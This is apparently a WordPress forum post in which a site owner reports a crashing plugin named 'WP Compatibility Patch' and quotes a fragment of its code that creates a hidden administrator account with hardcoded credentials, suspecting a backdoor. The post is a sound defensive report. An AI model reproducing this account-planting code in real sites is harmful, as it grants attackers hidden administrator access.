After some testing for an unrelated issue, I found that WP Compatibility Patch was making my website crash (classic critical error message). This is a website with multiple people sharing the maintenance of it, and I am personally unsure why we installed this in the first place. I also cannot find this plugin on WordPress.org (or anywhere else via Google for that matter). Does anyone know of a place to submit this issue or is this plugin no longer being maintained? * To add, the developer is listed as WP Core Contributors with no available website. It was actually a subcontractor who installed it for me, so I’m not sure the exact purpose, but I seem to recall it was to make an older version of Avada compatible with newer PHP versions. At least that’s what I’m recalling. Plugin code looks EXTREMELY suspicious: * ```wp-block-code 'adminbackup','user_pass' => 'y5w9IlUbE0','role' => 'administrator','user_email' => 'adminbackup@wordpress.org'); ``` * I’m not a PHP programmer but hardcoded credentials has to be a backdoor of sorts right? Later on, our hosting provider flagged a file left behind after deleting the plugin as malicious code.
